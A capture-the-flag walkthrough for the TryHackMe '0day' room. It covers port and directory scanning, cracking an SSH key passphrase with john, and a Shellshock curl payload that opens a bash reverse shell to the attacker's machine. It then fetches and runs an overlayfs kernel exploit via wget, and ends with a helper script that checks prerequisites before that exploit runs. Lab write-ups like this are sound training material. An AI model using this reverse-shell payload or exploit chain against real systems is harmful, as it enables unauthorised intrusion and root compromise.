0day

Room Link: https://tryhackme.com/room/0day

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Most of what this turned up appeared to be a rabbit hole, but among it was a private SSH key (id_rsa), and its passphrase could be bruteforced with john:

Kali

chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

Enumerating /cgi-bin/ turned up a .cgi script. My first Shellshock check against it appeared not to work, but the script turned out to be vulnerable.

Kali

gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi

Initial Shell

Link: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi

Kali#1

nc -lvnp 4242

Kali #2

curl -H "Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1" http://$VICTIM/cgi-bin/test.cgi

The header must be in double quotes so that $KALI is expanded locally; inside single quotes the literal string $KALI reaches the target, where it is unset, and the connect-back never arrives.

Upgrade to a full TTY (tab completion, job control, Ctrl-C that does not kill the shell)

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Victim

uname -a 

Kali

searchsploit 3.13.0
searchsploit -m linux/local/37292.c
gcc 37292.c -o exploit
python2 -m SimpleHTTPServer 81

Running it on the victim failed: 37292.c compiles a small helper shared library with gcc at run time, and it complained that it couldn't create that dynamic library.

Victim

cd /tmp/
wget http://10.10.91.55:81/exploit
chmod +x exploit
./exploit

The shell spawned through CGI comes with a minimal PATH, so the exploit cannot find gcc. Setting a normal PATH before re-running it is enough:

Victim

export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
./exploit
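The PATH problem above is easy to hit from any CGI- or web-spawned shell, and it is cheaper to check the exploit's prerequisites than to debug a cryptic failure. The script below is an added example, not part of the original writeup: it normalises PATH the same way the export above does, then checks that gcc is resolvable and that the working directory is writable before the exploit is run. The directory list and /tmp as working directory are my assumptions.

```shell
#!/bin/sh
# Added example (not from the original writeup): preflight checks before
# running a compiled kernel exploit such as 37292.c from a CGI-spawned shell.
# The exploit builds a helper shared library with gcc at run time, so a PATH
# without the compiler produces the "couldn't create dynamic library" error.
# Assumed: standard Ubuntu directory list below, /tmp as the working directory.

STD_PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
WORKDIR="/tmp"

# Print $1 extended with every directory from the colon list $2 that it does
# not already contain (order of $1 is preserved, nothing is duplicated).
ensure_path() {
    current="$1"
    old_ifs="$IFS"; IFS=':'; set -- $2; IFS="$old_ifs"
    for d in "$@"; do
        case ":$current:" in
            *":$d:"*) ;;
            *) current="${current:+$current:}$d" ;;
        esac
    done
    printf '%s' "$current"
}

# 0 if tool $1 resolves with PATH set to $2 (checked in a subshell so the
# caller's PATH is untouched).
have_tool() {
    ( PATH="$2"; command -v "$1" >/dev/null 2>&1 )
}

# 0 if $1 is a directory we can write to (the exploit drops files there).
writable_dir() {
    [ -d "$1" ] && [ -w "$1" ]
}

# Run all checks, report, and return 1 if anything would break the exploit.
preflight() {
    fixed=$(ensure_path "${PATH:-}" "$STD_PATH")
    rc=0
    if have_tool gcc "$fixed"; then
        echo "gcc: found"
    else
        echo "gcc: MISSING even with PATH=$fixed; exploit cannot build ofs-lib.so"
        rc=1
    fi
    if writable_dir "$WORKDIR"; then
        echo "$WORKDIR: writable"
    else
        echo "$WORKDIR: not writable; choose another working directory"
        rc=1
    fi
    echo "suggested: export PATH=$fixed"
    return $rc
}

if ! preflight; then
    echo "preflight failed; fix the items above before running ./exploit"
fi
```

Run it in the same shell you will launch the exploit from, then apply the suggested export; if gcc is genuinely absent rather than merely off PATH, the exploit cannot work as written and the helper library would have to be built elsewhere.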
